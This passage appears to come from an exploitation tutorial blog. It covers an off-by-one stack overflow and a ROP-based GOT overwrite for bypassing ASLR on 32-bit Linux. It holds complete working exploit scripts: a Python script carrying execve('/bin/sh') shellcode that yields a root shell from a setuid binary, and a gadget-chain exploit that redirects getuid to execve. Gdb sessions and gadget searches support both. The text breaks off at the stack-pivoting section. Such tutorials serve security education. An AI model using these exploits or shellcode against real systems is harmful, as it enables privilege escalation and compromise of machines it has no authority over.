 0x08048498 <+1>: mov %esp,%ebp                //set callee's (main) ebp to esp
 0x0804849a <+3>: push %edi                    //backup EDI
 0x0804849b <+4>: sub $0x8,%esp                //create stack space
 0x0804849e <+7>: mov 0xc(%ebp),%eax           //eax = argv
 0x080484a1 <+10>: add $0x4,%eax               //eax = &argv[1]
 0x080484a4 <+13>: mov (%eax),%eax             //eax = argv[1]
 0x080484a6 <+15>: movl $0xffffffff,-0x8(%ebp) //String Length Calculation -- Begins here
 0x080484ad <+22>: mov %eax,%edx
 0x080484af <+24>: mov $0x0,%eax
 0x080484b4 <+29>: mov -0x8(%ebp),%ecx
 0x080484b7 <+32>: mov %edx,%edi
 0x080484b9 <+34>: repnz scas %es:(%edi),%al
 0x080484bb <+36>: mov %ecx,%eax
 0x080484bd <+38>: not %eax
 0x080484bf <+40>: sub $0x1,%eax               //String Length Calculation -- Ends here
 0x080484c2 <+43>: cmp $0x100,%eax             //eax = strlen(argv[1]). if eax > 256
 0x080484c7 <+48>: jbe 0x80484e9 <main+82>     //Jmp if NOT greater
 0x080484c9 <+50>: movl $0x80485e0,(%esp)      //If greater print error string,flush and return.
 0x080484d0 <+57>: call 0x8048380 <puts@plt>   
 0x080484d5 <+62>: mov 0x804a020,%eax          
 0x080484da <+67>: mov %eax,(%esp)             
 0x080484dd <+70>: call 0x8048360 <fflush@plt>
 0x080484e2 <+75>: mov $0x1,%eax              
 0x080484e7 <+80>: jmp 0x80484fe <main+103>
 0x080484e9 <+82>: mov 0xc(%ebp),%eax          //argv[1] <= 256, eax = argv
 0x080484ec <+85>: add $0x4,%eax               //eax = &argv[1]
 0x080484ef <+88>: mov (%eax),%eax             //eax = argv[1]
 0x080484f1 <+90>: mov %eax,(%esp)             //foo arg
 0x080484f4 <+93>: call 0x8048464              //call foo
 0x080484f9 <+98>: mov $0x0,%eax               //return value

 //Function Epilogue
 0x080484fe <+103>: add $0x8,%esp              //unwind stack space
 0x08048501 <+106>: pop %edi                   //restore EDI
 0x08048502 <+107>: pop %ebp                   //restore EBP
 0x08048503 <+108>: ret                        //return
End of assembler dump.
(gdb) disassemble foo
Dump of assembler code for function foo:
 //Function prologue
 0x08048464 <+0>: push %ebp                    //backup caller's (main) ebp
 0x08048465 <+1>: mov %esp,%ebp                //set callee's (foo) ebp to esp
 0x08048467 <+3>: sub $0x4,%esp                //create stack space
 0x0804846a <+6>: mov 0x8(%ebp),%eax           //foo arg
 0x0804846d <+9>: mov %eax,(%esp)              //bar arg = foo arg
 0x08048470 <+12>: call 0x8048477              //call bar

 //Function Epilogue 
 0x08048475 <+17>: leave                       //unwind stack space + restore ebp
 0x08048476 <+18>: ret                         //return
End of assembler dump.
(gdb) disassemble bar
Dump of assembler code for function bar:
 //Function Prologue
 0x08048477 <+0>: push %ebp                    //backup caller's (foo) ebp
 0x08048478 <+1>: mov %esp,%ebp                //set callee's (bar) ebp to esp
 0x0804847a <+3>: sub $0x108,%esp              //create stack space
 0x08048480 <+9>: mov 0x8(%ebp),%eax           //bar arg
 0x08048483 <+12>: mov %eax,0x4(%esp)          //strcpy arg2
 0x08048487 <+16>: lea -0x100(%ebp),%eax       //buf
 0x0804848d <+22>: mov %eax,(%esp)             //strcpy arg1
 0x08048490 <+25>: call 0x8048370 <strcpy@plt> //call strcpy

 //Function Epilogue
 0x08048495 <+30>: leave                       //unwind stack space + restore ebp
 0x08048496 <+31>: ret                         //return
End of assembler dump.
(gdb)

Stack Layout:

As we already know user input of size 256, overwrites the LSB of foo’s EBP with a NULL byte. So when foo’s EBP stored just above destination buffer ‘buf’ is overwritten with a single NULL byte, ebp gets changed from 0xbffff2d8 to 0xbffff200. From the stack layout we could see that stack location 0xbffff200 is part of destination buffer ‘buf’ and since user input gets copied into this destination buffer, attacker has control over this stack location (0xbffff200) and thus he has control over instruction pointer (eip) using which he can achieve arbitrary code execution. Lets test this out by sending a series of “A”‘s of size 256.

Test Step 1: Is EBP overwrite and thus return address overwrite possible?

(gdb) r `python -c 'print "A"*256'`
Starting program: /home/sploitfun/lsploits/new/obo/stack/vuln `python -c 'print "A"*256'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

Above output shows we have control over instruction pointer (EIP) because of EBP overwrite!!

Test Step 2: What is the offset from destination buffer.

Now lets find at what offset from the beginning of the destination buffer ‘buf’, we need to place our return address. Do remember in off-by-one vulnerability we arent overwriting actual return address stored in stack (like we do in stack based buffer overflows) instead a 4 byte memory region inside the attacker controlled destination buffer ‘buf’ will be treated as return address location (after off-by-one overflow). Thus we need to find this return address location offset (from ‘buf’) which is part of destination buffer ‘buf’ itself. Not very clear, no issues just read on!!

Lets now try to understand CPU execution starting at text segment address 0x08048490:

  • 0x08048490 – call strcpy – This instruction execution results in off-by-one overflow, hence foo’s EBP value (stored in stack location 0xbffff2cc) gets changed from 0xbffff2d8 to 0xbffff200.
  • 0x08048495 – leave – A leave instruction unwinds this function’s stack space and restores ebp.
leave: mov ebp, esp;        //unwind stack space by setting esp to ebp. 
       pop ebp;             //restore ebp
*** As per our example: ***
leave: mov ebp, esp;        //esp = ebp = 0xbffff2cc
       pop ebp;             //ebp = 0xbffff200 (Overwritten EBP value is now stored in ebp register); esp = 0xbffff2d0
  • 0x08048495 – ret – Returns to foo’s instruction 0x08048475
  • 0x08048475 – leave – A leave instruction unwinds this function’s stack space and restores ebp.
*** As per our example: ***
leave: mov ebp, esp;        //esp = ebp = 0xbffff200 (As part of unwinding esp is shifted down instead of up!!)
       pop ebp;             //ebp = 0x41414141; esp = 0xbffff204
  • 0x08048476 – ret – Return’s to instruction located at ESP (0xbffff204). Now ESP is pointing to attacker controlled buffer and hence attacker can return to anyplace he wants to achieve arbitrary code execution.

Now lets get back to our original test of finding the offset to return address from destination buffer ‘buf’. As shown in our stack layout picture, ‘buf’ is located at 0xbffff158 and from following the CPU execution we know that return address location inside the destination buffer ‘buf’ is located at 0xbffff204. Hence offset to return address from ‘buf’ is 0xbffff204 – 0xbffff158 = 0xac. Thus user input of form “A”*172 + “B”*4 + “A”*80, overwrites EIP with “BBBB”.

$ cat exp_tst.py 
#exp_tst.py
#!/usr/bin/env python
import struct
from subprocess import call

buf = "A" * 172
buf += "B" * 4
buf += "A" * 80

print "Calling vulnerable program"
call(["./vuln", buf])

$ python exp_tst.py 
Calling vulnerable program
$ sudo gdb -q vuln 
Reading symbols from /home/sploitfun/lsploits/new/obo/stack/vuln...(no debugging symbols found)...done.
(gdb) core-file core
[New LWP 4055]
warning: Can't read pathname for load map: Input/output error.
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

Above output shows that attacker gets control over return address. Return address is located at offset (0xac) from ‘buf’. With these informations, lets write an exploit program to achieve arbitrary code execution.

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#Spawn a shell. 
#execve(/bin/sh) Size- 28 bytes.
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"

ret_addr = 0xbffff218

#endianess conversion
def conv(num):
 return struct.pack("<I",num)

#Junk + Return Address + NOP's + Shellcode + Junk
buf = "A" * 172
buf += conv(ret_addr)
buf += "\x90" * 30
buf += scode
buf += "A" * 22

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Off-by-one looks like a silly bug and its weird that such small mistake by developer could lead to arbitrary code execution. Does off-by-one bug always lead to arbitrary code execution?

What if caller’s EBP isnt present just above destination buffer?

The answer to this question is simple, we cant exploit it using EBP overwrite technique!! ( But some other exploit technique might be possible since after all a bug exists in the code 😛 )

Under what scenarios caller’s EBP wont be present just above the destination buffer?

Scenario 1: Some other local variable might be present above the destination buffer.

...
void bar(char* arg) {
 int x = 10; /* [1] */
 char buf[256]; /* [2] */ 
 strcpy(buf, arg); /* [3] */ 
}
...

Thus in these cases a local variable is found in between the end of buffer ‘ buf’ and EBP which doesnt allow us to overwrite LSB of EBP!!

Scenario 2: Alignment space – By default gcc aligns stack space to 16 bytes boundaries ie) before creating stack space ESP’s last 4 bit is zero’d out using ‘and’ instruction as shown in the below function disassembly.

Dump of assembler code for function main:
 0x08048497 <+0>: push %ebp
 0x08048498 <+1>: mov %esp,%ebp
 0x0804849a <+3>: push %edi
 0x0804849b <+4>: and $0xfffffff0,%esp               //Stack space aligned to 16 byte boundary
 0x0804849e <+7>: sub $0x20,%esp                     //create stack space
...

Thus in these cases an alignment space (of upto 12 bytes) is found in between the end of buffer ‘buf’ and EBP which doesnt allow us to overwrite LSB of EBP!!

Because of this reason we added the gcc argument “-mpreferred-stack-boundary=2” while compiling our vulnerable code (vuln.c)!!

Help!!: What if ESP is already aligned on a 16 byte boundary level before creating stack space? In such cases EBP overwrite should be possible even when program is compiled with gcc’s default stack boundary of 16 bytes. But till now I have failed to create such a working code. In all my trials before creating stack space ESP isnt aligned on a 16 byte boundary no matter how carefullly I create my stack contents, gcc adds some extra space for local variables which makes ESP to be unaligned to 16 byte boundary level. If anybody has a working code or has an answer to why ESP is always unaligned, please let me know!!

Reference:

1. http://seclists.org/bugtraq/1998/Oct/109 

Bypassing ASLR – Part III

Prerequisite:

  1. Classic Stack Based Buffer Overflow
  2. Bypassing ASLR – Part I

VM Setup: Ubuntu 12.04 (x86)

In this post lets see how to bypass shared library address randomization using GOT overwrite and GOT dereference technique. As mentioned in part I, even if executable doesnt have the required PLT stub codes, attacker can bypass ASLR using GOT overwrite and GOT dereferencing techniques.

Vulnerable Code:

// vuln.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main (int argc, char **argv) {
 char buf[256];
 int i;
 seteuid(getuid());
 if(argc < 2) {
  puts("Need an argument\n");
  exit(-1);
 }
 strcpy(buf, argv[1]);
 printf("%s\nLen:%d\n", buf, (int)strlen(buf));
 return 0;
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

NOTE:

  1. system@PLT isnt present in our executable ‘vuln’.
  2. String “sh” isnt present in our executable ‘vuln’.

What is GOT overwrite?

This technique helps the attacker to overwrite the GOT entry of a particular libc function with function address of another libc function. For example GOT[getuid] contains getuid function address (after first invocation), but it can be overwritten with execve function address – when offset difference is added to GOT[getuid]. We already know, in shared libraries the offset of a function from it base address is always constant. Thus if we add the difference in the offsets of two libc functions (execve and getuid) to the value of getuid’s GOT entry, we obtain the execve function address. Later on, invocation of getuid invokes execve!!

offset_diff = execve_addr - getuid_addr
GOT[getuid] = GOT[getuid] + offset_diff

What is GOT dereference?

This technique is similar to GOT overwrite, but here instead of overwriting the GOT entry of a particular libc function, its value is copied into a register and offset difference is added to the register content. Thus now the register contains required libc function address. For example GOT[getuid] contains getuid function address, which gets copied to a register. The difference in the offsets of two libc functions (execve and getuid) gets added to register contents. Now jumping to the register value invokes execve!!

offset_diff = execve_addr - getuid_addr
eax = GOT[getuid]
eax = eax + offset_diff

Both the technique looks simpler, but how to perform these actions in runtime when a buffer overflow occurs?!? We need to identify a function (which does these additions and copying the result to register) and jump to that particular function to achieve GOT overwrite/dereference. But obviously no single function (neither in libc nor in our executable) does it for us!! In such cases ROP is used.

What is ROP?

ROP is a technique in which attacker once gains control of call stack, he can execute carefully crafted machine instruction to perform his desired actions even if there is no straightforward way!!. For example in return-to-libc attacks, we overwrote the return address with system address, to execute system(). But if system (and execve family of functions) are stripped off from libc shared library, attacker cant get root shell. In such cases, ROP comes to attackers rescue. In this technique even if any required libc function isnt present, attacker can simulate the required libc function by executing a series of gadgets.

What is gadget?

Gadgets are a set of assembly instructions which ends with a ‘ret‘ assembly instruction. Attacker overwrites return address with a gadget address, this gadget contains set of assembly instructions which are similar to first few assembly instructions of system(). Thus returning to this gadget address executes a part of system() functionality. Remaining part of system() functionality is done by returning to some other gadget. In this way, chaining a series of gadgets can simulate system() functionality. Thus system gets executed even if stripped off!!

But how to find available gadgets in an executable?

Its found using gadget tools. There are many tools (like ropeme, ROPgadget, rp++) which helps attackers to find gadgets in a binary. These tools basically look for a ‘ret’ instruction and then look backwards to find a series of useful machine instructions.

In our case we dont need to simulate any libc functionality using rop gadgets instead we need to overwrite GOT entry of a libc function or we need to make sure any register points to a libc function address. Lets see how GOT overwrite and GOT dereference is achieved using ROP gadgets!!

GOT overwrite using ROP:

– Gadget 1: First we need a gadget which does adding offset difference to GOT[getuid]. So lets look for an add gadget which copies the result to memory location.

$ ~/roptools/rp++ --atsyntax -f ./vuln -r 1
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
65 found.

A total of 65 gadgets found.
...
0x080486fb: addb %dh, -0x01(%esi,%edi,8) ; jmpl *0x00(%ecx) ; (1 found)
0x0804849e: addl %eax, 0x5D5B04C4(%ebx) ; ret ; (1 found)
...
$

Bingo we found an add gadget which copies the result to memory location!! Now if we can make ebx contain GOT[getuid] – 0x5d5b04c4 and eax contain offset difference, we can successfully perform GOT overwrite!!

– Gadget 2: Makes sure ebx contains GOT entry of getuid. GOT entry of getuid (as shown below) is located at 0x804a004. Thus ebx should be loaded with 0x804a004, but since in add gadget a constant value (0x5d5b04c4) is added to ebx, lets minus that constant value from our ebx ie) ebx =0x804a004 -0x5d5b04c4 = 0xaaa99b40. Now we need to find a gadget which copies this value (0xaaa99b40) into ebx register.

$ objdump -R vuln
vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE 
08049ff0 R_386_GLOB_DAT __gmon_start__
0804a000 R_386_JUMP_SLOT printf
0804a004 R_386_JUMP_SLOT getuid
...
$ ~/roptools/rp++ --atsyntax -f ./vuln -r 1
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
65 found.

A total of 65 gadgets found.
...
0x08048618: popl %ebp ; ret ; (1 found)
0x08048380: popl %ebx ; ret ; (1 found)
0x08048634: popl %ebx ; ret ; (1 found)
...
$ 

Bingo we found a ‘pop ebx’ gadget. Thus after pushing the value (0xaaa99b40) into stack and returning to “pop ebx” instruction, ebx contains 0xaaa99b40.

– Gadget 3: Makes sure eax contains offset difference. Thus we need to find a gadget which copies the offset difference into eax register.

$ gdb -q vuln
...
(gdb) p execve
$1 = {} 0xb761a1f0 
(gdb) p getuid
$2 = {} 0xb761acc0 
(gdb) p/x execve - getuid
$4 = 0xfffff530
(gdb) 
...
$ ~/roptools/rp++ --atsyntax -f ./vuln -r 1
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
65 found.

A total of 65 gadgets found.
...
0x080484a3: popl %ebp ; ret ; (1 found)
0x080485cf: popl %ebp ; ret ; (1 found)
0x08048618: popl %ebp ; ret ; (1 found)
0x08048380: popl %ebx ; ret ; (1 found)
0x08048634: popl %ebx ; ret ; (1 found)
...
$

Thus pushing offset difference (0xfffff530) into stack and returning to “pop eax” instruction, copies offset difference into eax. But unfortunately in our binary ‘vuln’ we couldnt find ‘popl %eax; ret;’ gadget. Hence GOT overwrite is NOT possible.

Stack Layout: Below picture depicts chaining of gadgets to achieve GOT overwrite.

GOT dereference using ROP:

– Gadget 1: First we need a gadget which does adding offset difference to GOT[getuid] and its result needs to be loaded in a register. So lets look for an add gadget which copies the result to register.

$ ~/roptools/rp++ --atsyntax -f ./vuln -r 4
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
166 found.

A total of 166 gadgets found.
...
0x08048499: addl $0x0804A028, %eax ; addl %eax, 0x5D5B04C4(%ebx) ; ret ; (1 found)
0x0804849e: addl %eax, 0x5D5B04C4(%ebx) ; ret ; (1 found)
0x08048482: addl %esp, 0x0804A02C(%ebx) ; calll *0x08049F1C(,%eax,4) ; (1 found)
0x0804860e: addl -0x0B8A0008(%ebx), %eax ; addl $0x04, %esp ; popl %ebx ; popl %ebp ; ret ; (1 found)
...
$

Bingo we found an add gadget which copies the result into register!! Now if we can make ebx contain GOT[getuid] + 0xb8a0008 and eax contain offset difference, we can successfully perform GOT dereference!!

– Gadget 2: As seen in GOT overwrite ‘pop %ebx; ret;’ gadget is found in executable ‘vuln’

– Gadget 3: As seen in GOT overwrite ‘pop %eax; ret;’ gadget is NOT found in executable ‘vuln’

– Gadget 4: Invoke execve() by calling register. Hence we need a ‘call *eax’ gadget

$ ~/roptools/rp++ --atsyntax -f ./vuln -r 1
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
65 found.

A total of 65 gadgets found.
...
0x080485bb: calll *%-0x000000E0(%ebx,%esi,4) ; (1 found)
0x080484cf: calll *%eax ; (1 found)
0x0804860b: calll *%eax ; (1 found)
...
$

Bingo we found ‘call *eax’ gadget.  But still since gadget 3 ‘popl %eax; ret;’ isnt found, GOT dereference isnt possible.

Stack Layout: Below picture depicts chaining of gadgets to achieve GOT dereference.

When it looked like no more way exists (atleast for me when I begin’d to learn about ROP), Reno introduced me to the below solution using manual ROP gadget search!! Thanks man!! 🙂 So read on!!

Manual ROP gadget search: Since rop gadget tools couldnt find ‘pop eax;ret;’ gadget, lets do a manual search to find if any interesting gadgets could be found that helps us to copy offset difference into eax register.

Disassemble binary ‘vuln’ (using below command)

$objdump -d vuln > out

– Gadget 4: Load eax with offset difference (0xfffff530). Disassembly shows a mov instruction which copies stack content into eax.

80485b3: mov 0x34(%esp),%eax
80485b7: mov %eax,0x4(%esp)
80485bb: call *-0xe0(%ebx,%esi,4)
80485c2: add $0x1,%esi
80485c5: cmp %edi,%esi
80485c7: jne 80485a8 <__libc_csu_init+0x38>
80485c9: add $0x1c,%esp
80485cc: pop %ebx
80485cd: pop %esi
80485ce: pop %edi
80485cf: pop %ebp
80485d0: ret

But looks like ‘ret’ (0x80485d0) is quite far from this instruction (0x80485b3). So the challenge here is until ‘ret’ we need to make sure eax doesnt get modified.

Unmodified EAX: Here lets see how to leave eax unmodified until ret instruction (0x80485d0). There is a call instruction (0x80485bb), so lets load ebx and esi in such a way that call instruction invokes a function which doesnt modify eax. Looks like _fini doesnt modify eax!!

0804861c <_fini>:
804861c: push %ebx
804861d: sub $0x8,%esp
8048620: call 8048625 <_fini+0x9>
8048625: pop %ebx
8048626: add $0x19cf,%ebx
804862c: call 8048450 <__do_global_dtors_aux>
8048631: add $0x8,%esp
8048634: pop %ebx
8048635: ret

08048450 <__do_global_dtors_aux>:
8048450: push %ebp
8048451: mov %esp,%ebp
8048453: push %ebx
8048454: sub $0x4,%esp
8048457: cmpb $0x0,0x804a028
804845e: jne 804849f <__do_global_dtors_aux+0x4f>
...
804849f: add $0x4,%esp
80484a2: pop %ebx
80484a3: pop %ebp
80484a4: ret

_fini invokes _do_global_dtors_aux, here eax could be left untouched when we set 0x1 to memory location 0x804a028.

What should be values of ebx and esi, to invoke _fini?

  1. First we need to find a memory location which contains the address of _fini (0x804861c). As shown below memory address 0x8049f3c contains _fini address.
    0x8049f28 :    0x00000001 0x00000010 0x0000000c 0x08048354
    0x8049f38 <_DYNAMIC+16>: 0x0000000d 0x0804861c 0x6ffffef5 0x080481ac
    0x8049f48 <_DYNAMIC+32>: 0x00000005 0x0804826c
  2. Set esi to 0x01020101. This value is preferred since we cant have 0x0 in esi value since its a strcpy vulnerable code and zero is a bad character!! Also do make sure that the resultant value (stored in ebx) too doesnt contain zero!!
  3. Set ebx as shown below:
    ebx+esi*4-0xe0 = 0x8049f3c
    ebx = 0x8049f3c -(0x01020101*0x4) + 0xe0
    ebx = 0x3fc9c18

Thus we found that inorder to call _fini, we need to make sure ebx and esi should be loaded with 0x3fc9c18 and 0x01020101, respectively.

Also do make sure that eax doesnt get modified between _fini return (0x8048635) and ret instruction (0x80485d0). This could be achieved by setting edi = esi + 1. When edi = esi + 1, jump instruction (0x80485c7) makes sure control jumps to (0x80485c9) instruction. After which, we could see that from this instruction (0x80485c9) until ret (0x80485d0), eax is not accessed!!

– Gadget 5: Load ebx with 0x3fc9c18.

$ ~/roptools/rp++ --atsyntax -f ./vuln -r 1
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
65 found.

A total of 65 gadgets found.
...
0x08048618: popl %ebp ; ret ; (1 found)
0x08048380: popl %ebx ; ret ; (1 found)
0x08048634: popl %ebx ; ret ; (1 found)
...
$

– Gadget 6: Load esi with 0x01020101 and edi with 0x01020102.

$ ~/roptools/rp++ --atsyntax -f ./vuln -r 3
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
135 found.

A total of 135 gadgets found.
...
0x080485ce: popl %edi ; popl %ebp ; ret ; (1 found)
0x080485cd: popl %esi ; popl %edi ; popl %ebp ; ret ; (1 found)
0x08048390: pushl 0x08049FF8 ; jmpl *0x08049FFC ; (1 found)
...
$

– Gadget 7: Copy 0x1 to memory location 0x804a028.

$ ~/roptools/rp++ --atsyntax -f ./vuln -r 5
Trying to open './vuln'..
Loading ELF information..
FileFormat: Elf, Arch: Ia32
Using the AT&T syntax..

Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.

in LOAD
183 found.

A total of 183 gadgets found.
...
0x080485ca: les (%ebx,%ebx,2), %ebx ; popl %esi ; popl %edi ; popl %ebp ; ret ; (1 found)
0x08048498: movb $0x00000001, 0x0804A028 ; addl $0x04, %esp ; popl %ebx ; popl %ebp ; ret ; (1 found)
0x0804849b: movb 0x83010804, %al ; les (%ebx,%ebx,2), %eax ; popl %ebp ; ret ; (1 found)
...
$

Now we have completed our gadget search!! Lets begin the game!!

Gadget Search Summary:

  • For successful invocation of gadget 1, we need gadgets 2 and 3.
  • Since gadget 3 is not available, we did manual search and found gadgets 4, 5, 6 and 7.
    • For successful invocation of gadget 4, we need gadgets 5, 6 and 7.

Exploit Code: Below exploit code overwrites GOT[getuid] with execve function address!!

#!/usr/bin/env python
import struct
from subprocess import call

'''
 G1: 0x0804849e: addl %eax, 0x5D5B04C4(%ebx) ; ret ;
 G2: 0x080484a2: popl %ebx ; pop ebp; ret ;
 G3: 0x????????: popl %eax ; ret ; (NOT found)
 G4: 0x080485b3: mov 0x34(%esp),%eax...
 G5: 0x08048380: pop ebx ; ret ;
 G6: 0x080485cd: pop esi ; pop edi ; pop ebp ; ret ;
 G7: 0x08048498: movb $0x1,0x804a028...
'''

g1 = 0x0804849e
g2 = 0x080484a2
g4 = 0x080485b3
g5 = 0x08048380
g6 = 0x080485cd
g7 = 0x08048498
dummy = 0xdeadbeef
esi = 0x01020101
edi = 0x01020102
ebx = 0x3fc9c18 #ebx = 0x8049f3c - (esi*4) + 0xe0
off = 0xfffff530

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = "A" * 268 #Junk
buf += conv(g7) #movb $0x1,0x804a028; add esp, 0x04; pop ebx; pop ebp; ret;
buf += conv(dummy)
buf += conv(dummy)
buf += conv(dummy)
buf += conv(g6) #pop esi; pop edi; pop ebp; ret;
buf += conv(esi) #esi
buf += conv(edi) #edi
buf += conv(dummy)
buf += conv(g5) #pop ebx; ret;
buf += conv(ebx) #ebx
buf += conv(g4) #mov 0x34(%esp),%eax; ...

for num in range(0,11):
 buf += conv(dummy)

buf += conv(g2) #pop ebx; pop ebp; ret;
ebx = 0xaaa99b40 #getuid@GOT-0x5d5b04c4
buf += conv(ebx)
buf += conv(off)
buf += conv(g1) #addl %eax, 0x5D5B04C4(%ebx); ret;
buf += "B" * 4

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit code generates a core file. Open the core file to see GOT[getuid] gets overwritten with execve function address (as shown below).

$ python oexp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��ᆳ�ᆳ�ᆳ�ͅᆳހ�����ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳ�ᆳޢ�@���0�����BBBB
Len:376
sploitfun@sploitfun-VirtualBox:~/lsploits/new/aslr/part3$ sudo gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/aslr/part3/vuln...(no debugging symbols found)...done.
(gdb) core-file core 
[New LWP 18781]
warning: Can't read pathname for load map: Input/output error.
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) x/1xw 0x804a004
0x804a004 <getuid@got.plt>: 0xb761a1f0
(gdb) p getuid
$1 = {} 0xb761acc0 
(gdb) p execve
$2 = {} 0xb761a1f0 
(gdb) 

Bingo we have successfully overwritten getuid’s GOT entry with execve address. Thus from now on any invocation of getuid would invoke execve!!

Spawning root shell: Our exploit is still incomplete, we have just performed GOT overwrite and we are yet to spawn a root shell. Inorder to spawn a root shell, copy below libc functions (along with their arguments) to stack.

seteuid@PLT | getuid@PLT | seteuid_arg | execve_arg1 | execve_arg2 | execve_arg3

where

  • setuid@PLT – setuid’s plt code address (0x80483c0).
  • getuid@PLT – getuid’s plt code address (0x80483b0). But this invokes execve because we have already performed GOT overwrite.
  • seteuid_arg should be zero to obtain root shell.
  • execve_arg1 – filename – Address of string “/bin/sh”
  • execve_arg2 – argv – Address of argument array whose content is [Address of “/bin/sh”, NULL].
  • execve_arg3 – envp – NULL

As we saw in this post, since we cant directly overflow the buffer with zero (since zero is a bad character), we can use chain of strcpy calls to copy zero in place of seteuid_arg. But this solution cant be applied here since stack is randomized, knowing the exact address of seteuid_arg’s stack location becomes difficult.

How to bypass stack address randomization?

It can be bypassed using custom stack and stack pivoting techniques!!

What is custom stack?

Custom stack is the stack region controlled by attacker. He copies the chain of libc functions along with this function arguments to bypass stack randomization. Its bypassed since attacker chooses any non position independent and writable memory region of a process as custom stack. In our binary ‘vuln’, writable and non position independent memory region is from 0x804a000 to 0x804b000 (as shown below)

$ cat /proc//maps
08048000-08049000 r-xp 00000000 08:01 399848 /home/sploitfun/lsploits/aslr/vuln
08049000-0804a000 r--p 00000000 08:01 399848 /home/sploitfun/lsploits/aslr/vuln
0804a000-0804b000 rw-p 00001000 08:01 399848 /home/sploitfun/lsploits/aslr/vuln
b7e21000-b7e22000 rw-p 00000000 00:00 0 
b7e22000-b7fc5000 r-xp 00000000 08:01 1711755 /lib/i386-linux-gnu/libc-2.15.so
b7fc5000-b7fc7000 r--p 001a3000 08:01 1711755 /lib/i386-linux-gnu/libc-2.15.so
b7fc7000-b7fc8000 rw-p 001a5000 08:01 1711755 /lib/i386-linux-gnu/libc-2.15.so
b7fc8000-b7fcb000 rw-p 00000000 00:00 0 
b7fdb000-b7fdd000 rw-p 00000000 00:00 0 
b7fdd000-b7fde000 r-xp 00000000 00:00 0 [vdso]
b7fde000-b7ffe000 r-xp 00000000 08:01 1711743 /lib/i386-linux-gnu/ld-2.15.so
b7ffe000-b7fff000 r--p 0001f000 08:01 1711743 /lib/i386-linux-gnu/ld-2.15.so
b7fff000-b8000000 rw-p 00020000 08:01 1711743 /lib/i386-linux-gnu/ld-2.15.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
$

ie) Memory regions which contains .data and .bss segments can be used as custom stack location. I have chosen custom stack location to be 0x804a360.

Now having chosen the custom stack location, we need to copy the chain of libc functions along with their arguments to custom stack. In our case, copy the below libc functions (along with their arguments) to custom stack inorder to spawn a root shell.

seteuid@PLT | getuid@PLT | seteuid_arg | execve_arg1 | execve_arg2 | execve_arg3

To copy these contents into custom stack we need to overwrite the return address of actual stack with a series of strcpy calls. For example to copy seteuid@PLT (0x80483c0) to custom stack, we need

  • Four strcpy calls – One strcpy call for each hexadecimal value (0x08, 0x04, 0x83, 0xc0).
  • Source argument of strcpy call should be the address of executable memory region which contains the required hexadecimal value and also we need to make sure that the value present in the chosen memory location shouldn’t get modified.
  • Destination argument of strcpy call should be the address of custom stack location.

Following above procedure, we setup the complete custom stack. Once custom stack is setup’d, we need to move to custom stack from actual stack using stack pivoting technique!!

What is stack pivoting?

